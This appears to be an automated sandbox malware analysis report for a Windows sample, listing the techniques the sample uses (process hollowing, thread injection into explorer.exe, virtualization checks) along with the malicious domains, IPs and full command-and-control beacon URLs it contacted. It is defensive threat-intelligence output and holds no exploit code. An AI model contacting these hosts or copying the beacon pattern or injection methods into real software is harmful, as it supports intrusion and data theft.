          Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptDeobfuscate/Decode Files or Information1LSA SecretsSystem Information Discovery112SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
          Replication Through Removable MediaLaunchdRc.commonRc.commonObfuscated Files or Information41Cached Domain CredentialsSystem Owner/User DiscoveryVNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
          External Remote ServicesScheduled TaskStartup ItemsStartup ItemsSoftware Packing13DCSyncNetwork SniffingWindows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact

          Behavior Graph

          Hide Legend

          Legend:

          • Process
          • Signature
          • Created File
          • DNS/IP Info
          • Is Dropped
          • Is Windows Process
          • Number of created Registry Values
          • Number of created Files
          • Visual Basic
          • Delphi
          • Java
          • .Net C# or VB.NET
          • C, C++ or other language
          • Is malicious
          • Internet
          behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 356496 Sample: vBugmobiJh.exe Startdate: 23/02/2021 Architecture: WINDOWS Score: 100 33 www.activagebenefits.net 2->33 35 activagebenefits.net 2->35 43 Snort IDS alert for network traffic (e.g. based on Emerging Threat rules) 2->43 45 Multi AV Scanner detection for domain / URL 2->45 47 Found malware configuration 2->47 49 10 other signatures 2->49 11 vBugmobiJh.exe 3 2->11         started        signatures3 process4 file5 31 C:\Users\user\AppData\...\vBugmobiJh.exe.log, ASCII 11->31 dropped 59 Tries to detect virtualization through RDTSC time measurements 11->59 61 Injects a PE file into a foreign processes 11->61 15 vBugmobiJh.exe 11->15         started        18 vBugmobiJh.exe 11->18         started        signatures6 process7 signatures8 63 Modifies the context of a thread in another process (thread injection) 15->63 65 Maps a DLL or memory area into another process 15->65 67 Sample uses process hollowing technique 15->67 69 Queues an APC in another process (thread injection) 15->69 20 explorer.exe 15->20 injected process9 dnsIp10 37 rizrvd.com 34.102.136.180, 49731, 49737, 49738 GOOGLEUS United States 20->37 39 www.thebabyfriendly.com 154.80.226.18, 49745, 80 DXTL-HKDXTLTseungKwanOServiceHK Seychelles 20->39 41 17 other IPs or domains 20->41 51 System process connects to network (likely due to code injection or exploit) 20->51 24 netsh.exe 20->24         started        signatures11 process12 signatures13 53 Modifies the context of a thread in another process (thread injection) 24->53 55 Maps a DLL or memory area into another process 24->55 57 Tries to detect virtualization through RDTSC time measurements 24->57 27 cmd.exe 1 24->27         started        process14 process15 29 conhost.exe 27->29         started       

          Screenshots

          Thumbnails

          This section contains all screenshots as thumbnails, including those not shown in the slideshow.

          windows-stand

          Antivirus, Machine Learning and Genetic Malware Detection

          Initial Sample

          SourceDetectionScannerLabelLink
          vBugmobiJh.exe25%VirustotalBrowse
          vBugmobiJh.exe100%Joe Sandbox ML

          Dropped Files

          No Antivirus matches

          Unpacked PE Files

          SourceDetectionScannerLabelLinkDownload
          6.2.vBugmobiJh.exe.400000.0.unpack100%AviraTR/Crypt.ZPACK.GenDownload File

          Domains

          SourceDetectionScannerLabelLink
          climaxnovels.com6%VirustotalBrowse
          ramjamdee.com1%VirustotalBrowse

          URLs

          SourceDetectionScannerLabelLink
          http://www.founder.com.cn/cnO0%Avira URL Cloudsafe
          http://www.jiyu-kobo.co.jp/Y0ntPi0%Avira URL Cloudsafe
          http://www.founder.com.cn/cn/bThe0%URL Reputationsafe
          http://www.founder.com.cn/cn/bThe0%URL Reputationsafe
          http://www.founder.com.cn/cn/bThe0%URL Reputationsafe
          http://www.fontbureau.comsiefd$P0%Avira URL Cloudsafe
          http://www.jiyu-kobo.co.jp/uild$P0%Avira URL Cloudsafe
          http://www.rizrvd.com/bw82/?2dspCJ=AJ+QNFfpTCGoeNdN3oQHABBFVni950JEMBWacmvnp29IOaric6KDWsJikAvcMmAxBpMV&L6Ah=2dPLKjuxNzghip0%Avira URL Cloudsafe
          http://www.tiro.com0%URL Reputationsafe
          http://www.tiro.com0%URL Reputationsafe
          http://www.tiro.com0%URL Reputationsafe
          http://www.fontbureau.comsP0%Avira URL Cloudsafe
          http://www.wellnesssensation.com/bw82/?L6Ah=2dPLKjuxNzghip&2dspCJ=455EGVYP5nwn6UKaNruX/4AMFbR5eugGoFi+RSiFi9xq+Sc4S/7LJuL4z/DBianrCvuj0%Avira URL Cloudsafe
          http://www.fontbureau.comepko0%URL Reputationsafe
          http://www.fontbureau.comepko0%URL Reputationsafe
          http://www.fontbureau.comepko0%URL Reputationsafe
          http://www.goodfont.co.kr0%URL Reputationsafe
          http://www.goodfont.co.kr0%URL Reputationsafe
          http://www.goodfont.co.kr0%URL Reputationsafe
          http://www.fontbureau.comM.TTFzP0%Avira URL Cloudsafe
          http://www.sajatypeworks.com0%URL Reputationsafe
          http://www.sajatypeworks.com0%URL Reputationsafe
          http://www.sajatypeworks.com0%URL Reputationsafe
          http://www.typography.netD0%URL Reputationsafe
          http://www.typography.netD0%URL Reputationsafe
          http://www.typography.netD0%URL Reputationsafe
          http://www.gallerybrows.com/bw82/?2dspCJ=qtQC6ueLh9SPHvPoeB2W7XMv4DHg8NEty8uJPphl3NdNxxbo+oCUuV5k45UTpNkEWHc7&L6Ah=2dPLKjuxNzghip0%Avira URL Cloudsafe
          http://www.founder.com.cn/cn/cThe0%URL Reputationsafe
          http://www.founder.com.cn/cn/cThe0%URL Reputationsafe
          http://www.founder.com.cn/cn/cThe0%URL Reputationsafe
          http://www.galapagosdesign.com/staff/dennis.htm0%URL Reputationsafe
          http://www.galapagosdesign.com/staff/dennis.htm0%URL Reputationsafe
          http://www.galapagosdesign.com/staff/dennis.htm0%URL Reputationsafe
          http://fontfabrik.com0%URL Reputationsafe
          http://fontfabrik.com0%URL Reputationsafe
          http://fontfabrik.com0%URL Reputationsafe
          http://www.fontbureau.comB.TTF0%URL Reputationsafe
          http://www.fontbureau.comB.TTF0%URL Reputationsafe
          http://www.fontbureau.comB.TTF0%URL Reputationsafe
          http://www.jiyu-kobo.co.jp//0%URL Reputationsafe
          http://www.jiyu-kobo.co.jp//0%URL Reputationsafe
          http://www.jiyu-kobo.co.jp//0%URL Reputationsafe
          http://www.founder.com.cn/cnt0%URL Reputationsafe
          http://www.founder.com.cn/cnt0%URL Reputationsafe
          http://www.founder.com.cn/cnt0%URL Reputationsafe
          http://www.galapagosdesign.com/DPlease0%URL Reputationsafe
          http://www.galapagosdesign.com/DPlease0%URL Reputationsafe
          http://www.galapagosdesign.com/DPlease0%URL Reputationsafe
          http://www.jiyu-kobo.co.jp/Y00%URL Reputationsafe
          http://www.jiyu-kobo.co.jp/Y00%URL Reputationsafe
          http://www.jiyu-kobo.co.jp/Y00%URL Reputationsafe
          http://www.usmedicarenow.com/bw82/?2dspCJ=cQgJWKf8RQ1tgXmhpNlNvU1Wcwt7yBWYkRci+XoIvJPaxwQIB73a/eHibjyZxTY12AhF&L6Ah=2dPLKjuxNzghip0%Avira URL Cloudsafe
          http://www.ascendercorp.com/typedesigners.html0%URL Reputationsafe
          http://www.ascendercorp.com/typedesigners.html0%URL Reputationsafe
          http://www.ascendercorp.com/typedesigners.html0%URL Reputationsafe
          http://www.sandoll.co.kr0%URL Reputationsafe
          http://www.sandoll.co.kr0%URL Reputationsafe
          http://www.sandoll.co.kr0%URL Reputationsafe
          http://www.jiyu-kobo.co.jp/jp/2P0%Avira URL Cloudsafe
          http://www.urwpp.deDPlease0%URL Reputationsafe
          http://www.urwpp.deDPlease0%URL Reputationsafe
          http://www.urwpp.deDPlease0%URL Reputationsafe
          http://www.urwpp.de0%URL Reputationsafe
          http://www.urwpp.de0%URL Reputationsafe
          http://www.urwpp.de0%URL Reputationsafe
          http://www.zhongyicts.com.cn0%URL Reputationsafe
          http://www.zhongyicts.com.cn0%URL Reputationsafe
          http://www.zhongyicts.com.cn0%URL Reputationsafe
          http://www.jiyu-kobo.co.jp/tendHP0%Avira URL Cloudsafe
          http://www.sakkal.com0%URL Reputationsafe
          http://www.sakkal.com0%URL Reputationsafe
          http://www.sakkal.com0%URL Reputationsafe
          http://www.founder.com.cn/cnh0%Avira URL Cloudsafe
          http://www.jiyu-kobo.co.jp/ltt=P0%Avira URL Cloudsafe
          http://www.jiyu-kobo.co.jp//P0%Avira URL Cloudsafe
          http://www.founder.com.cn/cnd0%URL Reputationsafe
          http://www.founder.com.cn/cnd0%URL Reputationsafe
          http://www.founder.com.cn/cnd0%URL Reputationsafe
          http://www.jiyu-kobo.co.jp/oiolP0%Avira URL Cloudsafe
          http://www.galapagosdesign.com/0%URL Reputationsafe
          http://www.galapagosdesign.com/0%URL Reputationsafe
          http://www.galapagosdesign.com/0%URL Reputationsafe
          http://www.climaxnovels.com/bw82/?2dspCJ=ErYhPq0/zQvehGK9wS6+i9BP1HsxrMLlWLaBPkVFk6gJ3Rf5IPX3ZCPP9+b6hANSOkIk&L6Ah=2dPLKjuxNzghip0%Avira URL Cloudsafe
          www.rizrvd.com/bw82/0%Avira URL Cloudsafe
          http://www.agfamonotype.0%URL Reputationsafe
          http://www.agfamonotype.0%URL Reputationsafe
          http://www.agfamonotype.0%URL Reputationsafe
          http://www.galapagosdesign.com/%k0%Avira URL Cloudsafe
          http://www.jiyu-kobo.co.jp/vno0%Avira URL Cloudsafe
          http://www.thebabyfriendly.com/bw82/?L6Ah=2dPLKjuxNzghip&2dspCJ=r3fdhBxfm/17hO+WGttpxejAYTJXJLNaeaIMUW/kEa9Q3oKyIBTjSr0cbQanu0dSY6cl0%Avira URL Cloudsafe
          http://www.fontbureau.comcomm0%Avira URL Cloudsafe
          http://www.h2oturkiye.com/bw82/?2dspCJ=CMr/hCS473yTOMLQRlwKDrCPfcrQCABATOinOmsXstIRfABY7iJyJix7IPLOuntXuF5p&L6Ah=2dPLKjuxNzghip0%Avira URL Cloudsafe
          http://www.jiyu-kobo.co.jp/jp/0%URL Reputationsafe
          http://www.jiyu-kobo.co.jp/jp/0%URL Reputationsafe
          http://www.jiyu-kobo.co.jp/jp/0%URL Reputationsafe
          http://www.fonts.comKr0%Avira URL Cloudsafe
          http://www.jiyu-kobo.co.jp/2P0%Avira URL Cloudsafe
          http://www.carterandcone.coml0%URL Reputationsafe
          http://www.carterandcone.coml0%URL Reputationsafe
          http://www.carterandcone.coml0%URL Reputationsafe

          Domains and IPs

          Contacted Domains

          NameIPActiveMaliciousAntivirus DetectionReputation
          climaxnovels.com
          34.102.136.180
          truetrueunknown
          ramjamdee.com
          34.102.136.180
          truetrueunknown
          www.thebabyfriendly.com
          154.80.226.18
          truetrue
            unknown
            www.wellnesssensation.com
            52.128.23.153
            truetrue
              unknown
              h2oturkiye.com
              94.73.146.42
              truetrue
                unknown
                www.yjpps.com
                0.0.0.0
                truefalse
                  unknown
                  gallerybrows.com
                  34.102.136.180
                  truetrue
                    unknown
                    gdsjgf.com
                    34.102.136.180
                    truetrue
                      unknown
                      ext-sq.squarespace.com
                      198.185.159.144
                      truefalse
                        high
                        activagebenefits.net
                        34.102.136.180
                        truetrue
                          unknown
                          rizrvd.com
                          34.102.136.180
                          truetrue
                            unknown
                            www.ramjamdee.com
                            unknown
                            unknowntrue
                              unknown
                              www.activagebenefits.net
                              unknown
                              unknowntrue
                                unknown
                                www.fcoins.club
                                unknown
                                unknowntrue
                                  unknown
                                  www.gallerybrows.com
                                  unknown
                                  unknowntrue
                                    unknown
                                    www.usmedicarenow.com
                                    unknown
                                    unknowntrue
                                      unknown
                                      www.h2oturkiye.com
                                      unknown
                                      unknowntrue
                                        unknown
                                        www.climaxnovels.com
                                        unknown
                                        unknowntrue
                                          unknown
                                          www.gdsjgf.com
                                          unknown
                                          unknowntrue
                                            unknown
                                            www.chrisbubser.digital
                                            unknown
                                            unknowntrue
                                              unknown
                                              www.rizrvd.com
                                              unknown
                                              unknowntrue
                                                unknown

                                                Contacted URLs

                                                NameMaliciousAntivirus DetectionReputation
                                                http://www.rizrvd.com/bw82/?2dspCJ=AJ+QNFfpTCGoeNdN3oQHABBFVni950JEMBWacmvnp29IOaric6KDWsJikAvcMmAxBpMV&L6Ah=2dPLKjuxNzghiptrue
                                                • Avira URL Cloud: safe
                                                unknown
                                                http://www.wellnesssensation.com/bw82/?L6Ah=2dPLKjuxNzghip&2dspCJ=455EGVYP5nwn6UKaNruX/4AMFbR5eugGoFi+RSiFi9xq+Sc4S/7LJuL4z/DBianrCvujtrue
                                                • Avira URL Cloud: safe
                                                unknown
                                                http://www.gallerybrows.com/bw82/?2dspCJ=qtQC6ueLh9SPHvPoeB2W7XMv4DHg8NEty8uJPphl3NdNxxbo+oCUuV5k45UTpNkEWHc7&L6Ah=2dPLKjuxNzghiptrue
                                                • Avira URL Cloud: safe
                                                unknown
                                                http://www.usmedicarenow.com/bw82/?2dspCJ=cQgJWKf8RQ1tgXmhpNlNvU1Wcwt7yBWYkRci+XoIvJPaxwQIB73a/eHibjyZxTY12AhF&L6Ah=2dPLKjuxNzghiptrue
                                                • Avira URL Cloud: safe
                                                unknown
                                                http://www.climaxnovels.com/bw82/?2dspCJ=ErYhPq0/zQvehGK9wS6+i9BP1HsxrMLlWLaBPkVFk6gJ3Rf5IPX3ZCPP9+b6hANSOkIk&L6Ah=2dPLKjuxNzghiptrue
                                                • Avira URL Cloud: safe
                                                unknown
                                                www.rizrvd.com/bw82/true
                                                • Avira URL Cloud: safe
                                                low
                                                http://www.thebabyfriendly.com/bw82/?L6Ah=2dPLKjuxNzghip&2dspCJ=r3fdhBxfm/17hO+WGttpxejAYTJXJLNaeaIMUW/kEa9Q3oKyIBTjSr0cbQanu0dSY6cltrue
                                                • Avira URL Cloud: safe
                                                unknown
                                                http://www.h2oturkiye.com/bw82/?2dspCJ=CMr/hCS473yTOMLQRlwKDrCPfcrQCABATOinOmsXstIRfABY7iJyJix7IPLOuntXuF5p&L6Ah=2dPLKjuxNzghiptrue
                                                • Avira URL Cloud: safe
                                                unknown
                                                http://www.activagebenefits.net/bw82/?L6Ah=2dPLKjuxNzghip&2dspCJ=kkzs7wdk+a5EmvlejfiLHnYXY/z1ZZpbk/A0waQQyoH3vrpc5BJXUH7YClYSBXJaDwsItrue
                                                • Avira URL Cloud: safe
                                                unknown
                                                http://www.ramjamdee.com/bw82/?L6Ah=2dPLKjuxNzghip&2dspCJ=G5V/jI1lXUWhm2/po/i12Eg93VLS1Yw8/s5fANqQYS1eyL2v/ZzyMw3Ygf/31m6ddEJOtrue
                                                • Avira URL Cloud: safe
                                                unknown
                                                http://www.gdsjgf.com/bw82/?L6Ah=2dPLKjuxNzghip&2dspCJ=7KG5rMnJQVi61jAewyvwq06b8xrmRTVdiDIOhf904IMqwa5VOrK6tjTZXar9S1Zs43DYtrue
                                                • Avira URL Cloud: safe
                                                unknown

                                                URLs from Memory and Binaries

                                                NameSourceMaliciousAntivirus DetectionReputation
                                                http://www.founder.com.cn/cnOvBugmobiJh.exe, 00000001.00000003.211340323.0000000005727000.00000004.00000001.sdmpfalse
                                                • Avira URL Cloud: safe
                                                unknown
                                                http://www.fontbureau.com/designersGvBugmobiJh.exe, 00000001.00000002.232662960.0000000005810000.00000002.00000001.sdmp, explorer.exe, 00000007.00000000.252001525.0000000008B40000.00000002.00000001.sdmpfalse
                                                  high
                                                  http://www.jiyu-kobo.co.jp/Y0ntPivBugmobiJh.exe, 00000001.00000003.214840427.0000000005725000.00000004.00000001.sdmpfalse
                                                  • Avira URL Cloud: safe
                                                  unknown
                                                  http://www.fontbureau.com/designers/?vBugmobiJh.exe, 00000001.00000002.232662960.0000000005810000.00000002.00000001.sdmp, explorer.exe, 00000007.00000000.252001525.0000000008B40000.00000002.00000001.sdmpfalse
                                                    high
                                                    http://www.founder.com.cn/cn/bThevBugmobiJh.exe, 00000001.00000002.232662960.0000000005810000.00000002.00000001.sdmp, explorer.exe, 00000007.00000000.252001525.0000000008B40000.00000002.00000001.sdmpfalse
                                                    • URL Reputation: safe
                                                    • URL Reputation: safe
                                                    • URL Reputation: safe
                                                    unknown
                                                    http://www.fontbureau.comsiefd$PvBugmobiJh.exe, 00000001.00000003.216854776.0000000005725000.00000004.00000001.sdmpfalse
                                                    • Avira URL Cloud: safe
                                                    low
                                                    http://www.fontbureau.com/designers?vBugmobiJh.exe, 00000001.00000002.232662960.0000000005810000.00000002.00000001.sdmp, explorer.exe, 00000007.00000000.252001525.0000000008B40000.00000002.00000001.sdmpfalse
                                                      high
                                                      http://www.jiyu-kobo.co.jp/uild$PvBugmobiJh.exe, 00000001.00000003.214092584.0000000005725000.00000004.00000001.sdmpfalse
                                                      • Avira URL Cloud: safe
                                                      unknown
                                                      http://www.tiro.comexplorer.exe, 00000007.00000000.252001525.0000000008B40000.00000002.00000001.sdmpfalse
                                                      • URL Reputation: safe
                                                      • URL Reputation: safe
                                                      • URL Reputation: safe
                                                      unknown
                                                      http://www.fontbureau.comsPvBugmobiJh.exe, 00000001.00000003.216854776.0000000005725000.00000004.00000001.sdmpfalse
                                                      • Avira URL Cloud: safe
                                                      unknown
                                                      http://www.fontbureau.com/designersexplorer.exe, 00000007.00000000.252001525.0000000008B40000.00000002.00000001.sdmpfalse
                                                        high
                                                        http://www.fontbureau.comepkovBugmobiJh.exe, 00000001.00000003.227609079.0000000005720000.00000004.00000001.sdmpfalse
                                                        • URL Reputation: safe
                                                        • URL Reputation: safe
                                                        • URL Reputation: safe
                                                        unknown
                                                        http://www.goodfont.co.krvBugmobiJh.exe, 00000001.00000002.232662960.0000000005810000.00000002.00000001.sdmp, explorer.exe, 00000007.00000000.252001525.0000000008B40000.00000002.00000001.sdmpfalse
                                                        • URL Reputation: safe
                                                        • URL Reputation: safe
                                                        • URL Reputation: safe
                                                        unknown
                                                        https://stackpath.bootstrapcdn.com/bootstrap/4.5.0/css/bootstrap.min.cssvBugmobiJh.exe, 00000001.00000002.229831410.00000000026F1000.00000004.00000001.sdmpfalse
                                                          high
                                                          http://www.fontbureau.comM.TTFzPvBugmobiJh.exe, 00000001.00000003.216854776.0000000005725000.00000004.00000001.sdmpfalse
                                                          • Avira URL Cloud: safe
                                                          unknown
                                                          http://www.sajatypeworks.comvBugmobiJh.exe, 00000001.00000003.208761960.0000000005723000.00000004.00000001.sdmp, explorer.exe, 00000007.00000000.252001525.0000000008B40000.00000002.00000001.sdmpfalse
                                                          • URL Reputation: safe
                                                          • URL Reputation: safe
                                                          • URL Reputation: safe
                                                          unknown
                                                          http://www.typography.netDvBugmobiJh.exe, 00000001.00000002.232662960.0000000005810000.00000002.00000001.sdmp, explorer.exe, 00000007.00000000.252001525.0000000008B40000.00000002.00000001.sdmpfalse
                                                          • URL Reputation: safe
                                                          • URL Reputation: safe
                                                          • URL Reputation: safe
                                                          unknown
                                                          http://www.founder.com.cn/cn/cThevBugmobiJh.exe, 00000001.00000002.232662960.0000000005810000.00000002.00000001.sdmp, explorer.exe, 00000007.00000000.252001525.0000000008B40000.00000002.00000001.sdmpfalse
                                                          • URL Reputation: safe
                                                          • URL Reputation: safe
                                                          • URL Reputation: safe
                                                          unknown
                                                          http://www.galapagosdesign.com/staff/dennis.htmvBugmobiJh.exe, 00000001.00000002.232662960.0000000005810000.00000002.00000001.sdmp, vBugmobiJh.exe, 00000001.00000003.217860687.0000000005733000.00000004.00000001.sdmp, explorer.exe, 00000007.00000000.252001525.0000000008B40000.00000002.00000001.sdmpfalse
                                                          • URL Reputation: safe
                                                          • URL Reputation: safe
                                                          • URL Reputation: safe
                                                          unknown
                                                          http://fontfabrik.comvBugmobiJh.exe, 00000001.00000002.232662960.0000000005810000.00000002.00000001.sdmp, explorer.exe, 00000007.00000000.252001525.0000000008B40000.00000002.00000001.sdmpfalse
                                                          • URL Reputation: safe
                                                          • URL Reputation: safe
                                                          • URL Reputation: safe
                                                          unknown
                                                          http://www.fontbureau.comB.TTFvBugmobiJh.exe, 00000001.00000003.227609079.0000000005720000.00000004.00000001.sdmpfalse
                                                          • URL Reputation: safe
                                                          • URL Reputation: safe
                                                          • URL Reputation: safe
                                                          unknown
                                                          http://www.jiyu-kobo.co.jp//vBugmobiJh.exe, 00000001.00000003.214092584.0000000005725000.00000004.00000001.sdmpfalse
                                                          • URL Reputation: safe
                                                          • URL Reputation: safe
                                                          • URL Reputation: safe
                                                          unknown
                                                          http://www.founder.com.cn/cntvBugmobiJh.exe, 00000001.00000003.211149216.0000000000D4D000.00000004.00000001.sdmpfalse
                                                          • URL Reputation: safe
                                                          • URL Reputation: safe
                                                          • URL Reputation: safe
                                                          unknown
                                                          http://www.galapagosdesign.com/DPleasevBugmobiJh.exe, 00000001.00000002.232662960.0000000005810000.00000002.00000001.sdmp, explorer.exe, 00000007.00000000.252001525.0000000008B40000.00000002.00000001.sdmpfalse
                                                          • URL Reputation: safe
                                                          • URL Reputation: safe
                                                          • URL Reputation: safe
                                                          unknown
                                                          http://www.jiyu-kobo.co.jp/Y0vBugmobiJh.exe, 00000001.00000003.214840427.0000000005725000.00000004.00000001.sdmp, vBugmobiJh.exe, 00000001.00000003.214092584.0000000005725000.00000004.00000001.sdmpfalse
                                                          • URL Reputation: safe
                                                          • URL Reputation: safe
                                                          • URL Reputation: safe
                                                          unknown
                                                          http://www.ascendercorp.com/typedesigners.htmlvBugmobiJh.exe, 00000001.00000003.214832645.0000000005766000.00000004.00000001.sdmpfalse
                                                          • URL Reputation: safe
                                                          • URL Reputation: safe
                                                          • URL Reputation: safe
                                                          unknown
                                                          http://www.fonts.comvBugmobiJh.exe, 00000001.00000002.232662960.0000000005810000.00000002.00000001.sdmp, explorer.exe, 00000007.00000000.252001525.0000000008B40000.00000002.00000001.sdmpfalse
                                                            high
                                                            http://www.sandoll.co.krvBugmobiJh.exe, 00000001.00000002.232662960.0000000005810000.00000002.00000001.sdmp, explorer.exe, 00000007.00000000.252001525.0000000008B40000.00000002.00000001.sdmpfalse
                                                            • URL Reputation: safe
                                                            • URL Reputation: safe
                                                            • URL Reputation: safe
                                                            unknown
                                                            http://www.jiyu-kobo.co.jp/jp/2PvBugmobiJh.exe, 00000001.00000003.214371711.0000000005725000.00000004.00000001.sdmpfalse
                                                            • Avira URL Cloud: safe
                                                            unknown
                                                            http://www.urwpp.deDPleasevBugmobiJh.exe, 00000001.00000002.232662960.0000000005810000.00000002.00000001.sdmp, explorer.exe, 00000007.00000000.252001525.0000000008B40000.00000002.00000001.sdmpfalse
                                                            • URL Reputation: safe
                                                            • URL Reputation: safe
                                                            • URL Reputation: safe
                                                            unknown
                                                            http://www.urwpp.devBugmobiJh.exe, 00000001.00000003.216854776.0000000005725000.00000004.00000001.sdmpfalse
                                                            • URL Reputation: safe
                                                            • URL Reputation: safe
                                                            • URL Reputation: safe
                                                            unknown
                                                            http://www.zhongyicts.com.cnvBugmobiJh.exe, 00000001.00000002.232662960.0000000005810000.00000002.00000001.sdmp, explorer.exe, 00000007.00000000.252001525.0000000008B40000.00000002.00000001.sdmpfalse
                                                            • URL Reputation: safe
                                                            • URL Reputation: safe
                                                            • URL Reputation: safe
                                                            unknown
                                                            http://www.jiyu-kobo.co.jp/tendHPvBugmobiJh.exe, 00000001.00000003.214092584.0000000005725000.00000004.00000001.sdmpfalse
                                                            • Avira URL Cloud: safe
                                                            unknown
                                                            http://www.sakkal.comvBugmobiJh.exe, 00000001.00000002.232662960.0000000005810000.00000002.00000001.sdmp, explorer.exe, 00000007.00000000.252001525.0000000008B40000.00000002.00000001.sdmpfalse
                                                            • URL Reputation: safe
                                                            • URL Reputation: safe
                                                            • URL Reputation: safe
                                                            unknown
                                                            http://www.founder.com.cn/cnhvBugmobiJh.exe, 00000001.00000003.211340323.0000000005727000.00000004.00000001.sdmpfalse
                                                            • Avira URL Cloud: safe
                                                            unknown
                                                            http://www.jiyu-kobo.co.jp/ltt=PvBugmobiJh.exe, 00000001.00000003.214840427.0000000005725000.00000004.00000001.sdmpfalse
                                                            • Avira URL Cloud: safe
                                                            unknown
                                                            http://www.jiyu-kobo.co.jp//PvBugmobiJh.exe, 00000001.00000003.214840427.0000000005725000.00000004.00000001.sdmpfalse
                                                            • Avira URL Cloud: safe
                                                            unknown
                                                            http://www.founder.com.cn/cndvBugmobiJh.exe, 00000001.00000003.211098499.000000000572E000.00000004.00000001.sdmpfalse
                                                            • URL Reputation: safe
                                                            • URL Reputation: safe
                                                            • URL Reputation: safe
                                                            unknown
                                                            http://www.jiyu-kobo.co.jp/oiolPvBugmobiJh.exe, 00000001.00000003.214840427.0000000005725000.00000004.00000001.sdmpfalse
                                                            • Avira URL Cloud: safe
                                                            unknown
                                                            http://www.apache.org/licenses/LICENSE-2.0vBugmobiJh.exe, 00000001.00000002.232662960.0000000005810000.00000002.00000001.sdmp, explorer.exe, 00000007.00000000.252001525.0000000008B40000.00000002.00000001.sdmpfalse
                                                              high
                                                              http://www.fontbureau.comvBugmobiJh.exe, 00000001.00000002.232662960.0000000005810000.00000002.00000001.sdmp, explorer.exe, 00000007.00000000.252001525.0000000008B40000.00000002.00000001.sdmpfalse
                                                                high
                                                                http://www.galapagosdesign.com/vBugmobiJh.exe, 00000001.00000003.218063402.0000000005725000.00000004.00000001.sdmpfalse
                                                                • URL Reputation: safe
                                                                • URL Reputation: safe
                                                                • URL Reputation: safe
                                                                unknown
                                                                http://www.agfamonotype.vBugmobiJh.exe, 00000001.00000003.214840427.0000000005725000.00000004.00000001.sdmpfalse
                                                                • URL Reputation: safe
                                                                • URL Reputation: safe
                                                                • URL Reputation: safe
                                                                unknown
                                                                http://www.galapagosdesign.com/%kvBugmobiJh.exe, 00000001.00000003.217860687.0000000005733000.00000004.00000001.sdmpfalse
                                                                • Avira URL Cloud: safe
                                                                unknown
                                                                http://www.jiyu-kobo.co.jp/vnovBugmobiJh.exe, 00000001.00000003.214840427.0000000005725000.00000004.00000001.sdmpfalse
                                                                • Avira URL Cloud: safe
                                                                unknown
                                                                http://www.fontbureau.comcommvBugmobiJh.exe, 00000001.00000003.216854776.0000000005725000.00000004.00000001.sdmpfalse
                                                                • Avira URL Cloud: safe
                                                                unknown
                                                                http://www.jiyu-kobo.co.jp/jp/vBugmobiJh.exe, 00000001.00000003.214840427.0000000005725000.00000004.00000001.sdmpfalse
                                                                • URL Reputation: safe
                                                                • URL Reputation: safe
                                                                • URL Reputation: safe
                                                                unknown
                                                                http://www.fonts.comKrvBugmobiJh.exe, 00000001.00000003.209223636.000000000573B000.00000004.00000001.sdmpfalse
                                                                • Avira URL Cloud: safe
                                                                unknown
                                                                http://www.jiyu-kobo.co.jp/2PvBugmobiJh.exe, 00000001.00000003.214092584.0000000005725000.00000004.00000001.sdmpfalse
                                                                • Avira URL Cloud: safe
                                                                unknown
                                                                http://www.carterandcone.comlvBugmobiJh.exe, 00000001.00000002.232662960.0000000005810000.00000002.00000001.sdmp, explorer.exe, 00000007.00000000.252001525.0000000008B40000.00000002.00000001.sdmpfalse
                                                                • URL Reputation: safe
                                                                • URL Reputation: safe
                                                                • URL Reputation: safe
                                                                unknown
                                                                http://www.founder.com.cn/cn/vBugmobiJh.exe, 00000001.00000003.211716442.0000000005726000.00000004.00000001.sdmpfalse
                                                                • URL Reputation: safe
                                                                • URL Reputation: safe
                                                                • URL Reputation: safe
                                                                unknown
                                                                http://www.fontbureau.com/designers/cabarga.htmlNvBugmobiJh.exe, 00000001.00000002.232662960.0000000005810000.00000002.00000001.sdmp, explorer.exe, 00000007.00000000.252001525.0000000008B40000.00000002.00000001.sdmpfalse
                                                                  high
                                                                  http://www.ascendercorp.com/typedesigners.htmluvBugmobiJh.exe, 00000001.00000003.214832645.0000000005766000.00000004.00000001.sdmpfalse
                                                                  • Avira URL Cloud: safe
                                                                  unknown
                                                                  http://www.founder.com.cn/cnvBugmobiJh.exe, 00000001.00000002.232662960.0000000005810000.00000002.00000001.sdmp, explorer.exe, 00000007.00000000.252001525.0000000008B40000.00000002.00000001.sdmpfalse
                                                                  • URL Reputation: safe
                                                                  • URL Reputation: safe
                                                                  • URL Reputation: safe
                                                                  unknown
                                                                  http://www.fontbureau.com/designers/frere-jones.htmlvBugmobiJh.exe, 00000001.00000002.232662960.0000000005810000.00000002.00000001.sdmp, vBugmobiJh.exe, 00000001.00000003.216329040.0000000005739000.00000004.00000001.sdmp, explorer.exe, 00000007.00000000.252001525.0000000008B40000.00000002.00000001.sdmpfalse
                                                                    high
                                                                    http://www.jiyu-kobo.co.jp/APvBugmobiJh.exe, 00000001.00000003.214092584.0000000005725000.00000004.00000001.sdmpfalse
                                                                    • Avira URL Cloud: safe
                                                                    unknown
                                                                    http://www.fontbureau.comd2PvBugmobiJh.exe, 00000001.00000003.216854776.0000000005725000.00000004.00000001.sdmpfalse
                                                                    • Avira URL Cloud: safe
                                                                    unknown
                                                                    http://www.jiyu-kobo.co.jp/esvBugmobiJh.exe, 00000001.00000003.214092584.0000000005725000.00000004.00000001.sdmpfalse
                                                                    • Avira URL Cloud: safe
                                                                    unknown
                                                                    http://www.fontbureau.commvBugmobiJh.exe, 00000001.00000003.227609079.0000000005720000.00000004.00000001.sdmpfalse
                                                                    • URL Reputation: safe
                                                                    • URL Reputation: safe
                                                                    • URL Reputation: safe
                                                                    unknown
                                                                    http://www.jiyu-kobo.co.jp/vBugmobiJh.exe, 00000001.00000002.232662960.0000000005810000.00000002.00000001.sdmp, explorer.exe, 00000007.00000000.252001525.0000000008B40000.00000002.00000001.sdmpfalse
                                                                    • URL Reputation: safe
                                                                    • URL Reputation: safe
                                                                    • URL Reputation: safe
                                                                    unknown
                                                                    http://www.fontbureau.com/designers8vBugmobiJh.exe, 00000001.00000002.232662960.0000000005810000.00000002.00000001.sdmp, explorer.exe, 00000007.00000000.252001525.0000000008B40000.00000002.00000001.sdmpfalse
                                                                      high
